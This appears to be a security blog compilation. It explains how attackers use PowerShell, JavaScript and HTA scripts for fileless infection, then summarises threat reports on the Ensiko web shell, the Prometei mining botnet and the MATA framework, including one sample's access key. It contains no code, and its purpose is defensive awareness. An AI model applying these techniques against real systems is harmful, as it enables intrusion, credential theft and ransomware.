Script Attacks.. Encyclopaedia

Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to a disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movements post-infection.

Script-based attacks

A script can be anything from a sequence of simple system commands, advanced scripting languages used for system configurations, complex task automation, and other general purposes. Common scripting languages are VBScript, JavaScript, and PowerShell. Unlike applications that run after being compiled into machine code, computers interpret scripts.

How attackers use scripts

Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.

The use of scripts poses many advantages to the attacker: scripts are easy to write and execute, trivial to obfuscate, and extremely polymorphic. Moreover, attackers can use many types of script files to carry out an attack – the most popular being PowerShell, JavaScript, HTA, VBA, VBS, and batch scripts. Since fileless attacks occur in memory, traditional static file detection is rendered useless.

Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.

Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.


PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.

A malicious file loader using PowerShell

Attackers use poweshell in their attacks to load malware directly in memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.

As with other types of attacks, in a script-based attack, the initial hold of the victim generally occurs through a successful phishing attack, which contains a dropper – such as a PDF, RTF, Office file, or archive. In most cases, the dropper will then run a script, either a VBA macro or another type of script, such as PowerShell, JavaScript, or HTA.


JavaScript is a standard scripting language used in web pages, web applications, and browsers. JavaScript can manipulate and modify PDF files with implemented objects, web page links, and more. Most PDF-based attacks use the PDF reader software or an in-browser reader to run JavaScript code on the victims’ machine.

Additional script-based threats

HTML application (HTA) is a Microsoft Windows file meant to run on Internet Explorer, which combines HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through Microsoft HTA engine (mshta.exe) that has the local user’s privileges instead of Internet Explorer’s restricted privileges, with access to the filesystem and registry.

Malicious HTA files allow scripts to run the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or redirects from malicious websites.

Scripts to run in network is that safe ?

With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.

A basic first step any organization should consider is segmenting employees into several groups:

1. Running scripts is part of their day-to-day job
2. Running scripts is not common but might happen
3. There is no need to run scripts

With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance the ability to detect script-based attacks while allowing users who need to use scripts for their job function to do so without interruption.

Ensiko ! Highly Malware capable of Ransomware

Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP, making it a high risk for Windows, macOS, and Linux web servers.

The malware received the name Ensiko and is a web shell written in PHP. Attackers can use it to remotely control a compromised system and run a host of malicious activities.

Ensiko’s large list of capabilities, the file-encryption component stands out as it can be used for ransomware attacks against servers.

Researchers found that it uses the symmetric Rijnadel-128 cipher in CBC mode to encrypt files.

Ensiko encrypts files in a web shell directory and subdirectories and appends the .BAK extension to processed files.

The malware can be password protected for secure access and avoid a takeover like it happened last week with Emotet when someone replaced the malware payloads with memes.

Authenticating to this web shell is not straightforward. The developer hid the login form on a “Not Found” page. For the analyzed sample, the access key is “RaBiitch.”

To expand capabilities, Ensiko can load several tools, which the malware downloads from Pastebin and stores them in a directory named “tools_ensikology.”

One of the functions of the malware is called Steganologer, which can identify image files that have code in their metadata (EXIF headers). The code is then extracted and executed on the compromised server.

Ensiko can also check if a web shell from a predefined list is present on a remote host. Another scanning function called Remote File Check allows the operator to look for arbitrary files on a remote system.

Another function in this malicious tool allows recursive overwrite of all files with a specified extension in a directory of a web shell.

Ensiko’s capabilities do not stop at this, though. The malware lets threat actors run brute-force attacks on FTP, cPanel, and Telnet, thus enabling them extended access.

Prometei ! ₹ Crypto Mining Bots

One of the most advantageous qualities for a cyber threat to have it’s the ability to go unnoticed.

And its recent investigation found a botnet that does just that. Called “Prometei,” this cryptocurrency mining botnet uses techniques to fly under the radar of end-users, though the strategies themselves might be obvious to a defender.

“The actor employs various methods to spread across the network, like SMB with stolen credentials, psexec, WMI and SMB exploits. The adversary also uses several crafted tools that helps the botnet increase the amount of systems participating in its Monero-mining pool.”

“But this takeover didn’t stop its mining capabilities or the validation of stolen credentials. The botnet continues to make a moderate profit for a single developer, most likely based in Eastern Europe.

The actor behind it is also likely its developer. The TTPs indicate we may be dealing with a professional developer, based on their ability to integrate SMB exploits such as Eternal Blue and authentication code and the use of existing open-source projects, such as Mimikatz and FreeRDP.”

How it works ?

Everything starts with the main botnet file. The infection copies and spreads throughout the system, using passwords retrieved by a modified Mimikatz module and exploits like Eternal Blue.

The botnet has more than 15 executable modules that all get downloaded and driven by the main module, which constantly communicates with the command and control (C2) server over HTTP. However, the encrypted data is sent using RC4 encryption, and the module shares the key with the C2 using asymmetric encryption.

Apart from a large focus on spreading across the environment, Prometei also tries to recover administrator passwords. The discovered passwords are sent to the C2 and then reused by other modules that attempt to verify the validity of the passwords on other systems using SMB and RDP protocols.

In addition to stealing computing power, Prometei has another feature: stealing and validating credentials.

Although we only saw evidence of stolen credentials being used to spread laterally, they also have a value on underground markets and the damage potential of losing important administrative username and password is very high.

This is why organizations that detect the presence of Prometei botnet on their system should act immediately to remove it and to make sure none of their credentials are leaked to the command and control server

MATA Malware ! All the way from North Korea

Security researchers discovered a multi-platform malware framework called “MATA” that had succeeded in targeting victims worldwide.

The Russian security firm explained in its analysis that the first artifacts pertaining to MATA emerged back in April 2018. Whoever’s behind the malware framework then used the threat to target enterprises in Poland, Germany, Turkey, Korea, Japan and India.

The targeted organizations operated in several different economic sectors. Among the victims were a software company, an e-commerce business and an Internet Service Provider (ISP).

In these campaigns, the actors responsible for MATA demonstrated that they held various intentions for attacking their victims. With one organization, for instance, the malicious actors used the framework to query the victim’s databases for the sake of acquiring customer lists. With another victim, they used their threat to distribute VHD ransomware.

Researchers came across three versions of MATA that targeted either Windows, Linux and macOS.

The Windows version consisted of several components including a loader malware and an orchestrator element. Using a hardcoded hex-string, the loader invoked an encrypted payload. This action paved the way for the orchestrator to load plugin files and execute them from memory. Those plugins gave attackers the ability to manipulate files, create an HTTP proxy server and perform other tasks.

The Linux version of MATA was available on a legitimate distribution site, while the macOS variant arrived as a trojanized two-factor authentication (2FA) application.

The security firm revealed that a variant of Manuscrypt, a malware family distributed by Lazarus, also shared a similar configuration structure with MATA.